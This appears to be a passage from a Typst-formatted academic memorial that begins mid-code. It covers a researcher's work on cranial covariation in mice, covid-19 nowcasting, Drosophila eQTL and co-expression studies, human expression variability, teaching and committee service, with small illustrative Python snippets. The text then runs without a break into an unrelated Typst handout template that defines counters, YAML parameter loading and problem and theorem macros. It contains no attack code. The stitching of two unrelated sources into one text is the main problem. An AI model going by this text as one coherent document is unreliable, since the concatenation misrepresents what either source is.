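    0 = no integration, 1 = all variation along a single axis."""
    corr = np.corrcoef(traits, rowvar=False)
    eig = np.linalg.eigvalsh(corr)
    p = len(eig)
    # Eigenvalues of a correlation matrix average to 1; their maximum
    # possible variance is (p - 1), attained when one eigenvalue equals p.
    return float(np.var(eig) / (p - 1))

rng = np.random.default_rng(42)
# Independent traits: integration close to 0
low = rng.normal(size=(500, 6))
# Traits dominated by a shared factor: integration close to 1
factor = rng.normal(size=(500, 1))
high = factor + 0.3 * rng.normal(size=(500, 6))
print(integration(low), integration(high))
```

A statistic like this, computed per individual subsample or per group, is the kind of quantity that can then be related to growth rate in a regression or Bayesian model.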
At the beginning of 2020, before the containment measures brought about by the covid-19 pandemic, I devoted myself to consolidating and quality-controlling all the phenotypic and genotypic data from the colony we built during my PhD project. One advantage of collecting cranial phenotypes with the micro-CT scanner is that, after manually measuring every individual on the digitized images, it is possible to go back, find errors and inconsistencies in the measurements, and correct them. Because this is a very laborious process, few research groups devote the time and care needed to produce a robust dataset with the smallest possible measurement error. But I believe that, when dealing with measurements that can be a fraction of a millimeter, this care is crucial for having confidence in the analyses. To this end, I developed a verification protocol for the skull measurements that detects very small measurement errors and, using it, produced a highly precise and accurate set of measurements of cranial variation in these animals. This protocol was applied to all scanned animals, and the data were consolidated and organized into a database that can support a series of future projects.
In parallel, Prof. <NAME> began working on techniques for automatic landmarking of the micro-CT images using machine-learning methods. These methods make it possible to have an algorithm take the measurements automatically instead of measuring the skulls by hand. In this project, Arthur developed an algorithm that automatically places all the landmarks on the skull and can be used to measure the skulls of every animal in the colony. My dataset, of unprecedented scale and quality, is ideal for developing and validating automatic measurement techniques such as these. We have thus established a promising collaboration that will allow us to understand exactly how traditional and automatic measurements differ and what the consequences of those differences are.
Today, I am the only researcher actively exploring the genetic and phenotypic data from our colony and, in addition to my discussions with Prof. Gabriel, I keep in touch with Prof. Jason and the other researchers involved in the initial project: <NAME>, currently at the University of Bristol in the United Kingdom, and Prof. <NAME>, of the University of Exeter in the United Kingdom. This consolidated dataset provides a rich substrate for studying genetic architecture, covariation, and their interaction with microevolutionary processes, and thus enables a series of projects with specific questions.
Some of these projects are already under way, such as mapping the genetic architecture and identifying pleiotropic genes for the growth and cranial phenotypes, quantifying the relationship between genetic architecture and covariation, linking the genetic architecture of the experimental population to the evolutionary history of the founders, and elucidating the mechanistic basis of the link between intensity of integration and growth. We can use our data, combined with the comparative data accumulated at the LEM over the years, to understand how the micro- and macroevolution of morphological phenotypes are connected. This colony also makes it possible to quantify the contribution of maternal effects to variation in all measured phenotypes, and to understand the evolutionary consequences of this variation via indirect effects. In addition, we can develop new methods for the genetic mapping of high-dimensional phenotypes and explore the inheritance pattern of cranial variation. The time and effort spent producing this dataset are certainly repaid by the opportunities for advancing knowledge that it provides.
Beyond my project with the mice, during my postdoc I continued collaborating with other former members of the laboratory. I highlight two studies developed mainly with Prof. <NAME>, of Oklahoma State University (OSU), and Prof. <NAME>, of the Federal University of Bahia, among other collaborators. In these studies, we returned to the evolutionary consequences of covariation in primate skulls, focusing on methodological differences in measuring covariation among morphological characters @Machado2019-af, and on the influence of developmental processes on the maintenance of covariation patterns throughout the lives of individuals in several mammalian groups @Hubbe2022-xb. Once again, I contributed by developing all the statistical and methodological components, continuing the pattern of collaboration I had established during my PhD.
== The pandemic and the Observatório Covid-19 BR
In March 2020, after finishing the data collection described above, I was invited by Prof. <NAME> to join an epidemiological modeling project he was coordinating, the Observatório Covid-19 BR#footnote[#link("https://covid19br.github.io/")]. The project's goal was to produce short-term projections for the course of the covid-19 pandemic in Brazil, using epidemiological models and hospitalization data for severe acute respiratory illness from SIVEP-GRIPE#footnote[#link("http://info.gripe.fiocruz.br/")] and, later, from eSUS Notifica#footnote[#link("https://datasus.saude.gov.br/notifica/")]. The project was a collaboration between researchers from the Department of Ecology at IB-USP, the Institute for Theoretical Physics at UNESP, the Department of Mathematics at the Federal University of ABC, and dozens of other universities and institutes in several countries#footnote[#link("https://covid19br.github.io/sobre")]. The project was a success, and the Observatório Covid-19 BR's projections were widely reported in the media and used by several public and private bodies to plan responses to the pandemic. My participation centered on developing methods for estimating epidemiological parameters from the hospitalization data and on analyzing those data to understand the dynamics of the pandemic in Brazil. Without any statistical treatment, the hospitalization data give a picture of the pandemic that can be up to 40 days out of step with reality. The main Observatório product in which I was directly involved was a set of methods for _nowcasting_, that is, for assessing the current state of the pandemic while correcting for reporting delays in the data.
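The intuition behind this kind of delay correction can be sketched in a few lines. This is a deliberately minimal toy, not the Observatório's actual method (which modeled delays statistically with uncertainty): if the reporting-delay distribution is assumed known, counts for recent onset dates can be inflated by the probability that a case from that date has already been reported:

```python
import numpy as np

def nowcast(reported: np.ndarray, delay_pmf: np.ndarray) -> np.ndarray:
    """Toy nowcasting by delay correction.
    reported[t]  = cases with onset on day t reported so far.
    delay_pmf[d] = probability a case is reported d days after onset."""
    T = len(reported)
    cdf = np.cumsum(delay_pmf)
    estimate = reported.astype(float).copy()
    for t in range(T):
        days_observed = T - t  # days elapsed since onset day t
        # Expected fraction of day-t cases already reported by now
        frac = cdf[min(days_observed - 1, len(cdf) - 1)]
        estimate[t] = reported[t] / frac
    return estimate

# Example: constant true incidence of 100/day with a 5-day reporting delay
delay = np.array([0.3, 0.25, 0.2, 0.15, 0.1])
true_cases = np.full(10, 100)
observed = np.array([
    int(true_cases[t] * np.cumsum(delay)[min(10 - t - 1, 4)]) for t in range(10)
])
print(nowcast(observed, delay))
```

In practice the delay distribution itself must be estimated from the data and carries uncertainty, which is why the real methods were built as statistical models rather than a point correction like this.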
== Ayroles Lab
During my PhD and postdoc at USP, I established an independent collaboration with the laboratory of Prof. <NAME> at Princeton University in the United States. Prof. Julien leads a genetics research group that uses, among other models, a large and diverse colony of _Drosophila melanogaster_, with a focus on investigating epistatic interactions between genes. His laboratory uses genetic mapping, modern large-scale phenotyping techniques, and other tools from systems biology and quantitative genetics to understand the genetic architecture underlying variation in many kinds of phenotypes, such as gene expression, morphology, or even behavior. Collaborating with this group allows me to investigate aspects of genetic architecture that require larger samples than would be feasible with mice, such as the influence of epistasis on covariation, phenotype-environment interactions, or the covariation among the expression levels of many genes simultaneously. As a result of this collaboration, at the end of 2019 Prof. Ayroles and I decided to submit a proposal for a postdoctoral fellowship at Princeton, the _Princeton Presidential Postdoctoral Research Fellowship_. Thus, in July 2020 I joined the Ayroles Lab. My contribution to the group has been to bring a perspective that goes beyond variation in each trait independently, focusing on multivariate phenotypes and their pattern of covariation. This multivariate approach makes it possible to study more complex genetic and evolutionary dynamics, revealing consequences that are impossible to access when investigating one trait at a time. Over my roughly three years at Princeton, I became involved in several projects, which I describe below.
=== The contribution of epistasis to adaptive responses
I faced an initial challenge at this new stage of my career: the impossibility of moving to Princeton due to restrictions on the issuance of American visas, a consequence of the pandemic. This led me to join projects already under way in Prof. Ayroles's laboratory. I established my first collaboration with Dr. <NAME>, a postdoc focused on understanding the impact of epistasis, the interaction between two or more genetic loci, on the evolution of complex traits. Epistasis, a crucial element of the genetic architecture of these traits, is challenging to study because large sample sizes are needed to detect it reliably.
Simon was analyzing data from an _Evolve & Resequence_ experiment#footnote[In E&R experiments, a population is exposed to an environmental pressure and has its allele frequencies tracked by sequencing as it adapts to the new environment.] involving an _outbred_#footnote[Genetically variable, as opposed to the homozygous inbred lines usually used in _D. melanogaster_ research.] population of _D. melanogaster_. Evolutionary adaptation, we believe, results from the interplay between selective sweeps, in which advantageous variants quickly become prevalent, and subtler changes at many loci, depending on the genetic architecture of the selected traits.
In the experiment, flies were kept on a standard control diet and on high-sugar diets, introduced as an environmental stressor, for more than 100 generations. We monitored allele-frequency changes in more than 4,000 flies, identifying loci under selection. The results showed that approximately 4% of the genome was under positive selection, in a mostly polygenic response. Most selected loci showed no sign of strong selective sweeps, but rather subtle allele-frequency shifts, consistent with a polygenic response. We also identified loci showing evidence of epistasis, with allele-frequency changes at one locus depending on another, as well as a pattern of linkage disequilibrium at the end of the experiment.
Beyond contributing to the data analysis, in this project I once again applied the combination of theory, experiments, and simulations. I developed a computational model that reproduced our experimental design, assessing the contribution of epistasis to the changes in allele frequencies and in linkage disequilibrium. Comparing additive and epistatic genetic architectures, I showed that only epistasis could explain the patterns observed in the experiment. These findings suggest that epistasis is a crucial component of the evolutionary response, and that polygenic responses may be more common than previously assumed.
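The spirit of this comparison can be sketched with a deliberately minimal toy (not the actual model used in the project): two linked biallelic loci affect fitness either additively or through a pairwise interaction, and a Wright-Fisher simulation tracks the resulting allele frequencies and linkage disequilibrium:

```python
import numpy as np

def simulate(epistatic: bool, n=1000, gens=100, s=0.05, seed=1):
    """Two-locus haploid Wright-Fisher simulation with selection and no
    recombination. Returns final allele frequencies (p, q) and the
    linkage disequilibrium D = freq(ab) - p*q."""
    rng = np.random.default_rng(seed)
    pop = rng.integers(0, 2, size=(n, 2))  # alleles start near frequency 0.5
    for _ in range(gens):
        if epistatic:
            # Fitness depends on the interaction: only the (1,1) haplotype
            # gains an advantage, which builds up positive D
            w = 1 + s * pop[:, 0] * pop[:, 1]
        else:
            # Fitness is the sum of independent per-locus effects
            w = 1 + s * (pop[:, 0] + pop[:, 1]) / 2
        parents = rng.choice(n, size=n, p=w / w.sum())
        pop = pop[parents]
    p, q = pop.mean(axis=0)
    D = np.mean(pop[:, 0] * pop[:, 1]) - p * q
    return p, q, D

print("additive: ", simulate(epistatic=False))
print("epistatic:", simulate(epistatic=True))
```

Under both architectures the selected alleles rise in frequency, but the haplotype structure left behind differs; in the real analysis this contrast, at a much larger scale and with a realistic breeding design, is what allowed the two architectures to be told apart.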
I presented this work at the _Society for Molecular Biology & Evolution_ congress, SMBE2023, and at the 2023 _Gordon Research Conference for Ecological and Evolutionary Genomics_.
=== eQTL mapping in D. melanogaster
The next project I tackled in the Ayroles Lab was done in collaboration with Prof. <NAME>, then a postdoc and now a professor at the Max Planck Institute for Biology in Tübingen, Germany. Our project aimed to bring to Drosophila the kind of catalogue of expression-regulating variants available for other organisms, such as humans and yeast. Drosophila is a model in which the vast majority of genetic mapping is done using panels of homozygous inbred lines, such as the DGRP @Mackay2012-ee or the DSPR @Long2014-uf. These panels are very useful for mapping additive effects, but they do not allow the detection of dominance or epistatic effects, which are fundamental for understanding the complex patterns of interaction between different loci. That requires an _outbred_ population, which is much harder to analyze because every individual in an experiment must be genotyped. With a genetically variable _outbred_ population, statistical power is not limited by the number of homozygous lines available in a given panel; instead, we can simply sample as many individuals as a given experiment requires. Using a genetically variable Drosophila population named NEX, created by crossing wild-derived lines collected in the Netherlands, we collected genetic and gene-expression data from more than 1,800 individuals and mapped expression-regulating loci (eQTLs) for more than 5,000 genes. With this unprecedented sample, it was possible to map cis- and trans-eQTLs for 98% of the genes expressed in D. melanogaster, increasing by thousands the number of genes in this species with known regulatory loci. For the first time in the context of a genetically variable population, the properties of local and distal regulation of gene expression were described in terms of genetic diversity, heritability, connectivity, and pleiotropy.
These results raise our understanding of the fruit fly to a level previously available for only a few other organisms, offering a new mapping resource that will expand the possibilities currently open to the Drosophila community. These resources are available at #link("https://drosophilaeqtl.org/") and the work is currently available as _pre-prints_ @Pallares2023-eh @Wolf2023-bb.
=== Modularity in gene co-expression networks
One of the aspects that most interested me in the work with Luisa was the pattern of gene co-expression. The phenotypic effect of a gene's expression is not determined in a vacuum, but depends on the expression levels of other genes. This dependence means that the optimal expression level of a gene is set by the expression of others. The balance among the expression levels of all genes in an organism leads to a particular co-expression pattern, which can be captured from the correlations between gene expression levels across individuals. We estimated these correlations among the expression levels of the genes expressed in NEX, our _outbred_ Drosophila population. Drawing on my experience with covariation and multivariate systems, I set out to identify groups of genes with similar expression patterns, the co-expression modules. These modules are characterized by preferential associations: genes in the same group are more strongly associated with one another than with genes in other modules. Identifying these modules is an important step toward reducing the dimensionality of the transcriptome's representation, letting the system's own variational organization define the gene groups of interest, which can then be analyzed separately or combined to interpret the pattern of gene regulation.
However, the tools available in the literature did not cope well with the volume of data in our experiment, yielding uninformative clusterings that excluded the vast majority of the genes analyzed. Looking to solve this problem, I sought inspiration in the complex-networks literature, which led us to an important realization: traditionally, community-detection algorithms assume that genes are organized into modules with preferential associations. This approach can be risky, however, because it presumes the existence of such modules _a priori_, ignoring other possible organizations of co-expression networks. We then asked whether it would be possible to find biologically meaningful communities without imposing a modular organization on gene co-expression networks, searching for these blocks of genes through a more general measure of similarity. To do so, we adapted a modern community-detection method, the _Stochastic Block Model_ (SBM), which does not assume the existence of modules with preferential associations. Instead, this class of models uses all the information contained in the co-expression network to separate genes into hierarchically organized blocks.
Using RNA-seq gene-expression data measured in two tissues from a heterogeneous population of Drosophila melanogaster, we showed that: (a) the SBM identifies ten times more groups than competing methods, while assigning all genes to groups (versus 10% in the usual methods); (b) several of these gene groups are not modular, that is, genes within a group are no more associated with one another than with other groups, despite showing clear functional enrichment for specific biological processes; and (c) the functional enrichment of non-modular groups is as strong as that of modular groups. These findings indicate that the transcriptome is structured in more complex ways than previously thought and suggest the need to revisit the assumption that modularity is the main factor structuring gene co-expression networks. This work is currently available as a _pre-print_ @Melo2023-ij.
=== Variability of gene expression in humans
An important research line in the Ayroles Lab is the study of genotype-by-environment interactions in humans, especially in the context of genotype-environment mismatches, in which human populations adapted to one environment are exposed to new environmental conditions, whether through migration or lifestyle change. In this context, a fundamental question concerns the baseline variability of gene expression in humans. Are there genes whose expression is consistently more or less variable, regardless of the environment? Or is variability in gene expression entirely context-dependent? To address this problem, in collaboration with a PhD student in the laboratory, <NAME>, we used publicly available RNA-seq datasets to investigate the landscape of variation in gene expression. Scott and I compiled more than 50 studies, encompassing more than 20,000 gene-expression measurements. These data cover a variety of tissues and make it possible to assess whether some genes are consistently more or less variable across tissues and datasets, as well as the mechanisms driving these patterns.
The results show that variation in gene expression is relatively similar across tissues and studies, indicating that the pattern of transcriptional variation is consistent. Building on this similarity, we created global and tissue-specific rankings of variation, showing that gene function, sequence variation, and gene regulatory signatures all contribute to variation in gene expression. Creating these global rankings was only possible thanks to my experience with multivariate data, as we drew on the mathematical techniques of quantitative genetics to develop our global ranking method. With this ranking, we showed that low-variation genes are associated with fundamental cellular processes, carry lower levels of genetic polymorphism, have higher gene-gene connectivity, and tend to be associated with transcription-linked chromatin states. High-variation genes, on the other hand, are enriched for immune-response and environmentally responsive genes, and are associated with higher levels of polymorphism.
These results reveal that the pattern of transcriptional variation is not random noise, but rather a consistent gene-level property that appears to be functionally constrained in human populations. Moreover, this commonly neglected aspect of molecular phenotypic variation carries important information for understanding complex traits and disease. This work was published in #cite(<Wolf2023-zw>, form: "prose"), an article on which I appear as co-first author.
= Ongoing projects and next steps
In contemporary biology, generating datasets is no longer the main challenge. With advances in DNA and RNA sequencing technologies and other high-precision techniques, the amount of available genomic and molecular-phenotype data has grown exponentially. This accumulation of information, although an important milestone, has brought unprecedented complexity to data analysis and interpretation. The only way to deal with this complexity is an integrative approach combining theory, experiments, and computational analyses. I believe my training and experience allow me to contribute to this integrative approach, and that the Instituto de Biociências at USP is the ideal place to develop this research program, because it has a solid reputation in interdisciplinary research and offers the broad range of resources, collaborations, and expertise needed to tackle the challenges of analyzing genomic and phenotypic data in an integrated way. An important realization concerns the amount of biological insight accumulated over years of research in morphological evolution and in the extensive quantitative-genetics theory developed in the twentieth century. Indeed, a kind of rediscovery of quantitative genetics produced one of the most influential papers of recent years @Boyle2017-jh, highlighting how many variants of small effect can interact to produce complex phenotypes. Evolutionary quantitative genetics is a powerful tool for understanding and dissecting the genetic architecture of complex phenotypes.
In the final years of my postdoc, my focus was on establishing an independent research program aimed at taking our understanding of gene co-expression networks to a new level. To this end, I established collaborations with leading experimental research groups, such as Prof. Ayroles's laboratory at Princeton and Prof. Pallares's laboratory in Tübingen, among others described here. These international collaborations have allowed me to develop projects at a scale that would not be possible in the Brazilian context. We are currently building a dataset that combines laboratory natural-selection experiments, in which populations are exposed to an environmental stressor for many generations, with acute-exposure experiments, in which a population is exposed to the stressor for a single generation. Each of these experiments involves tens of thousands of individuals and thousands of genomes and transcriptomes. This kind of experiment allows us to understand how the short-term, plastic response and the long-term, adaptive response are related. My interest in these experiments is to understand how gene co-expression relates to the adaptive response, and how epistasis influences this relationship. We have already shown how co-expression can have different structures depending on context @Melo2023-ij, and we now want to understand how this change relates to the adaptive and plastic responses, and to the genetic architecture of gene regulation. Developing new methods for co-expression analysis will certainly be essential for the knowledge generated by these projects to yield a deeper understanding of the mechanisms of regulation and adaptation related to gene expression. At the core of these projects is the idea that changes in the pattern of association among traits are a powerful integrative tool for predicting and interpreting the response of natural populations to environmental perturbations.
This idea can also be used to deepen our understanding of the progression of human diseases, in which the degradation of the homeostatic pattern of association among gene expression levels serves as an indicator of pathological states @Lea2019-pq.
I also continue my work on the genetic architecture of morphological traits, with important consequences for animal breeding and for understanding the macroevolutionary process. For this, I use the data I collected during my PhD, described above, and maintain collaborations with other groups interested in macroevolutionary problems, such as the laboratory of Prof. <NAME>, curator of the mammal collection at OSU, and Prof. <NAME>, of the Department of Genetics and Evolutionary Biology at IB-USP. I continue to develop methods for analyzing covariation and genetic architecture, and to apply these methods to the data I have collected. The theory of genetic effects on multivariate traits and the statistical techniques for detecting those effects are still underdeveloped areas that can be very fruitful for understanding the evolution of complex traits, with applications to the genetics of human disease.
The construction of these datasets and the collaborations already established, together with my computational experience with both simulations and custom analyses, allow me to continue developing an original, cutting-edge line of research that seeks to understand the relationship between genetic architecture, covariation, and multivariate evolution. This line of research fits well within the structure of the Institute of Biosciences, contributing an integrative view that links genetic processes to evolutionary processes and that can be instrumental for the other research lines. Moreover, the statistical methods I use and develop are relevant to human genetics, especially the modern genetic-mapping techniques applied to elucidating the genetic architecture of complex traits. These theoretical and methodological contributions could come not only through collaborations with the institute's other faculty, but also by offering courses that train students in evolutionary theory or in statistical methods, as I detail below.
= Teaching
Throughout my academic trajectory, I have always devoted time to teaching, whether contributing as a teaching assistant in undergraduate and graduate courses or offering courses, short courses, and workshops. As I have already mentioned, these teaching-assistant positions were very important in my training, allowing me to engage with areas and methods different from those I worked with in the laboratory. I believe these experiences were crucial in giving me a holistic and integrative view of biological questions, expanding my perspective beyond the scales of the organism and the populations most familiar to me. I served as a teaching assistant in several courses of the IB Department of Ecology, such as R programming, statistical models and, perhaps the most formative experience, the Atlantic Forest Field Course, organized by Profs. <NAME>, <NAME>, and <NAME>.
In the field course, we take 20 master's students to an ecological reserve in Barra do Una, south of Peruíbe. There, without internet access or cell phone signal, the students develop a series of small research projects and produce manuscripts, which are reviewed by the professors and teaching assistants. Over the course of a month, each student takes part in four group projects proposed by the course team. Each student also conceives and carries out an individual project, which is approved by the team of professors. Each project is supervised by an invited professor or a teaching assistant. It is a very intense course in experimental design, data collection and analysis, and scientific writing and presentation. In the edition I took part in, in 2015, only Professor Glauco, one other assistant, and I spent all 30 days with the students, while the other professors and guests typically stayed one week at a time. For me, it was like a condensed mentoring experience, as I helped produce a total of 40 small manuscripts, with up to 5 rounds of revision each. I learned a great deal about how to review a text, how to supervise projects in a high-pressure environment, and how to encourage students to do their best work. It was a difficult process for me, in which I learned a lot, both from getting things right and from getting them wrong. The most challenging part of the course was helping the students with their individual projects, since there were 20 students producing independent projects, all seeking guidance and help with the theory, analysis, and interpretation of their results. The cognitive demand of thinking through and interpreting 20 projects simultaneously is not small, but this was a formative moment for me.
I also contributed to the Genetics courses, serving as a teaching assistant for the Evolutionary Biology course over several years, and writing, with Dr. <NAME>, a course booklet#footnote[#link("https://github.com/lem-usp/apostila-bio-evol/blob/master/apostila-Bio312.pdf?raw=true").]. I also produced all the R practical-class material#footnote[#link("https://diogro.github.io/BioEvol/").] for Evolutionary Biology. In addition, I was a PAE teaching assistant for the Evolutionary Processes course twice during my graduate studies.
During my postdoc at USP, I offered a graduate course with Dr. Monique Simon in the Graduate Program in Comparative Biology at FFCLRP-USP, in Ribeirão Preto, in which we presented an introduction to modularity and evolutionary theory and connected these formalisms to their practical consequences. The course includes theoretical and practical classes and has been offered twice, in 2017 and 2019. I was also involved, together with several postdocs from all departments of the IB, in a practical course on scientific writing. Although writing is one of the most frequent and important activities of a scientific career, we receive very little focused writing training during graduate school. This is a pity, since writing is the main tool for disseminating the knowledge produced in our laboratories. Realizing this, I devoted considerable study time to improving my writing in English, focusing on articles and grant proposals. Our course introduces students to ways of thinking about scientific writing and offers methods for producing clear and engaging texts.
At Princeton, I served as a teaching assistant for a course on Human Genetics, Bioinformatics, and Evolutionary Biology, taught by professors <NAME>, <NAME>, and <NAME>; and for an Epidemiology course taught by Dr. <NAME>, for which my experience at the Observatório Covid-19 BR was fundamental. In the past year, I was also responsible for developing and teaching a Computing for Biology course, which introduced undergraduate students from several departments to the main concepts of programming and data analysis in R and Python, with a focus on research in ecology and genomics.
Beyond my teaching at Princeton, I remain dedicated to training students in Brazil by participating in the Quantitative Ecology Training Program#footnote[#link("https://serrapilheira.org/programa-de-formacao-em-ecologia-quantitativa/")], an initiative of the Serrapilheira Institute that aims to train master's students in modern quantitative methods. I took part as an instructor in a Statistical Modeling course organized in 2023 by Prof. <NAME>. In this course, I introduced students to the main concepts of statistical modeling, with a focus on linear and generalized models, and showed how to implement these models in practice. Starting in 2024, I take over the coordination of this statistical modeling course, in partnership with Dr. <NAME>, of _Re.Green_#footnote[#link("https://re.green/")], an NGO focused on conservation.
Based on these teaching experiences, I believe a good undergraduate or graduate program should provide the tools for students to become capable of conceiving, analyzing, and interpreting their data and experiments independently. For this, it is essential to offer both instrumental and theoretical courses. In this context, I present some contributions I could make to the department, seeking to give IB and USP students the best possible training, one oriented toward critical thinking, independence, and scientific rigor.
== Evolutionary theory
Of the undergraduate courses currently offered by the IB, the ones I would most like to teach are those involving the teaching of evolution, such as Evolutionary Processes, Evolutionary Biology, Multidisciplinary Approaches in Genetics, or one of the Genetics and Evolution courses. I could also contribute to the Introduction to Computer Programming for Biology course or to Introduction to Bioinformatics, presenting modern concepts in systems biology and bioinformatics.
As an elective, I would offer a course in Evolutionary Theory, presenting the theoretical foundations of evolutionary biology in greater depth, covering not only the traditional formulations in terms of allele frequencies due to Fisher and Wright, but also modern formulations such as the Price Theorem and multivariate quantitative genetics, along with the applications of these formalisms, such as animal breeding, genetic mapping, and evolutionary studies in natural populations. In an advanced graduate version, an evolutionary theory course could also cover multilevel selection, models of the maintenance of genetic variation, and eventually, for students with some knowledge of calculus, even the partial-differential-equation formulation of allele frequency evolution initiated by Kimura.
== Statistics in the age of computation
Another contribution I could offer at the undergraduate or graduate level would be a course on data analysis using modern computational tools and Bayesian models applied to biological problems. At the graduate level, this course could be planned jointly with the R programming and statistical modeling courses of the Department of Ecology, giving IB graduate students a complete path toward a modern and adaptable training in statistical methods, one that enables them to carry out their research with greater autonomy. One advantage of offering this kind of course at the Institute of Biosciences is the ability to emphasize applications in genomics, such as genetic mapping, evolutionary and demographic models, and methods for transcriptome analysis, which do not appear in traditional courses. These computational statistical and bioinformatics methods are increasingly relevant in biology, given the spread of large-scale genomic data that demand sophisticated and specific analyses.
= Administrative activities
Since my master's, I have consistently served as a student representative (RD) on several committees within the IB. My entry into this aspect of university life came not from a vocation for administrative activities or an interest in university politics, but from the pragmatic perception that someone had to play this role. An undergraduate classmate involved with the student union, <NAME>, invited me to run for RD on the IB Congregation because she thought I could be a good representative, but mainly because there were no other interested candidates. So, knowing that no one else would do it, I accepted the invitation.
Serving on the Congregation turned out to be very informative, as I could see up close how the university worked and how professors navigated university politics. It was then that I grasped the concrete consequences that university administration has for students, for professors, and for the university's core activities. In my first term as RD on the Congregation, I was able to observe closely the importance of student representation as a mechanism of dialogue between students, faculty, and the administrative bodies. For example, I remember a case in which two students had essentially identical requests (a deadline extension of some kind), but one of them contacted the RDs and explained the reason for the request, while the other simply submitted the required paperwork. The first had the request granted; the second did not. My perception of the importance of this activity meant that, after this first experience, I continued serving as RD on several committees throughout graduate school. During my master's, besides the Congregation, I also served as RD on the Graduate Committee. During my PhD, I again took part in the Congregation and the Graduate Committee, was then elected to the Research Committee for two terms, and finally represented the genetics students on the Program Coordinating Committee (CCP) of the Graduate Program in Biological Sciences (Genetics) for two terms, remaining as representative until the last month of my PhD. Throughout this trajectory on the committees, starting at the Congregation and moving down the hierarchy of committees that govern graduate studies to the CCP, I sought to participate in a constructive and proactive way that would contribute to student training, acting as a bridge between their interests and needs and the reality of the institute.
Thus, over my journey as a student representative and my work on the various committees of the Institute of Biosciences, I acquired a deep understanding of university dynamics and of the crucial role that student representation plays in this context. My initial motivation, which arose from the pragmatic need for someone to fill this role, turned into a genuine desire to contribute to the functioning of the institute. Today, in applying for this position, I bring not only academic knowledge and research experience, but also a perspective enriched by my time on the committees, where I observed the interaction between students, faculty, and the academic administration. I am committed to continuing to contribute to the training of students and to the functioning of university administration, now not only as a student representative, but as an educator dedicated to shaping the trajectory of future professionals and researchers.
#set par(
leading: 0.65em,
first-line-indent: 0em,
justify: false
)
#bibliography("memorial.bib",
style: "apa",
title: "References")
|
|
https://github.com/MichaelFraiman/TAU_template | https://raw.githubusercontent.com/MichaelFraiman/TAU_template/main/mfraiman-TAU-TA.typ | typst | // **** imports ****
// boxes
#import "mfraiman-boxes.typ" as box
// problem setup
#import "mfraiman-problem.typ" as problem
// theorems setup
#import "mfraiman-theorem.typ" as th
// lists
#import "mfraiman-lists.typ" as li
// Global parameters for the handout
#let g_les_num = state("LessonNumber", none)
#let g_les_date = state("LessonDate", "00.00.2000")
#let g_les_name = state("LessonName", "Hello World!")
#let g_les_name_header = state("LessonNameHeader", "Hello Header!")
#let g_les_num_symb = state("LessonNumberSymbol", "")
#let g_sol_disp = state("SolutionsDisplay", false)
#let g_answ_disp = state("AnswersDisplay", false)
//counters
#let ProblemNumber = counter("ProblemNumber")
#let InlineCounter = counter("InlineCounter")
#let TheoremCounter = counter("TheoremCounter")
//lengths
#let glob_font_size = 11pt
#let glob_baselineskip = glob_font_size * 1.35 //13.6pt
#let glob_b = glob_font_size * 2 //22pt
#let glob_leading = glob_b - glob_baselineskip
#let glob_rel_leading = 0.65em
#let glob_parskip = glob_leading + glob_baselineskip / 2
//global fonts
#let glob_font_rm = state("FontText", "Meta Serif Pro")
#let glob_font_sf = state("FontHead", "Helvetica Neue Pro")
#let glob_font_tt = state("FontMono", "Pt Mono")
//data loading
#let load_doc_params(
name,
class,
activity_type
) = {
//let full = name + ".json"
let full = name + ".yaml"
//let info_file = json(full)
let info_file = yaml(full)
let date_en = str(info_file.at(class).at(activity_type).date.en)
let date_he = str(info_file.at(class).at(activity_type).date.he)
let date = ""
if date_he == "" {
date = date_en
} else {
//date = date_en + " " + date_he
date = date_he + " " + date_en
}
let link_to_cc = none
if "link" in info_file.at(class).at(activity_type) {
link_to_cc = info_file.at(class).at(activity_type).link
}
let params = (
// general info for the course
// chapter
chapter_en: info_file.general.chapter.en,
chapter_he: info_file.general.chapter.he,
chapter_ar: info_file.general.chapter.ar,
chapter: "" + info_file.general.chapter.en + " " + info_file.general.chapter.he + " " + info_file.general.chapter.ar + "",
// part
part_en: info_file.general.part.en,
part_he: info_file.general.part.he,
part_ar: info_file.general.part.ar,
part: "" + info_file.general.part.en + " " + info_file.general.part.he + " " + info_file.general.part.ar + "",
// course
course_period: info_file.general.course.period,
//
display_sols: info_file.general.activity_types.at(activity_type),
paper: info_file.general.activity_types.at(activity_type).paper,
activity_name: info_file.general.activity_types.at(activity_type).activity_name,
// specific for the class
num: info_file.at(class).num,
name: info_file.at(class).name,
//name_header: info_file.at(class).name_header,
date_en: date_en,
date_he: date_he,
date: date,
num_symb: info_file.at(class).at(activity_type).num_symb,
// footer info
lecturer_name_en: info_file.general.lecturer.name.en,
lecturer_name_he: info_file.general.lecturer.name.he,
lecturer_email: info_file.general.lecturer.email,
lecturer_position_en: info_file.general.lecturer.position.en,
lecturer_position_he: info_file.general.lecturer.position.he,
teacher_position_en: info_file.general.teacher.position.en,
teacher_position_he: info_file.general.teacher.position.he,
teacher_name: info_file.general.teacher.name,
teacher_email: info_file.general.teacher.email,
course_period_word_en: info_file.general.course.period.word.en,
course_period_word_he: info_file.general.course.period.word.he,
course_period_en: info_file.general.course.period.dates.en,
course_period_he: info_file.general.course.period.dates.he,
reception_name_en: info_file.general.teacher.reception.name.en,
reception_name_he: info_file.general.teacher.reception.name.he,
reception_time_en: info_file.general.teacher.reception.time.en,
reception_time_he: info_file.general.teacher.reception.time.he,
pdf_info: info_file.general.teacher.pdf_info,
link_word_en: info_file.general.link.word.en,
link_word_he: info_file.general.link.word.he,
link_to_cc: link_to_cc
)
params
}
// lists
#let enum_l = li.enum_l
#let enum_big = li.enum_big.with(spacing: glob_b)
#let enum_cond = li.enum_cond
#let rr = li.rr.with(InlineCounter)
#let ur = li.ur
#let list_bull = li.list_bull.with(spacing: glob_b * 0.5)
#let enum_col = li.enum_col.with(InlineCounter)
//Problem setup
// needs a fix for g_sol_disp
#let prob = problem.problem.with(
ProblemNumber, //counter used to display problem number (ProblemNumber)
InlineCounter, //InlineCounter
prob_word: "Problem",
prob_punct: ".",
display_answer: context g_answ_disp.get(),
display_solution: context g_sol_disp.get(),
les_num: g_les_num,
les_num_symb: context g_les_num_symb.get(),
)
#let ex = problem.problem.with(
ProblemNumber, //counter used to display problem number (ProblemNumber)
InlineCounter, //InlineCounter
prob_word: "Example",
prob_punct: ".",
display_answer: context g_answ_disp.get(),
display_solution: context g_sol_disp.get(),
les_num: context g_les_num.get(),
les_num_symb: context g_les_num_symb.get(),
)
#let theorem = th.theorem.with(
TheoremCounter,
name: "Theorem",
les_num: context g_les_num.get(),
les_num_symb: context g_les_num_symb.get(),
body_style: "italic",
numbered: true
)
#let definition = th.theorem.with(
TheoremCounter,
name: "Definition",
les_num: context g_les_num.get(),
les_num_symb: context g_les_num_symb.get(),
body_style: "normal",
numbered: true
)
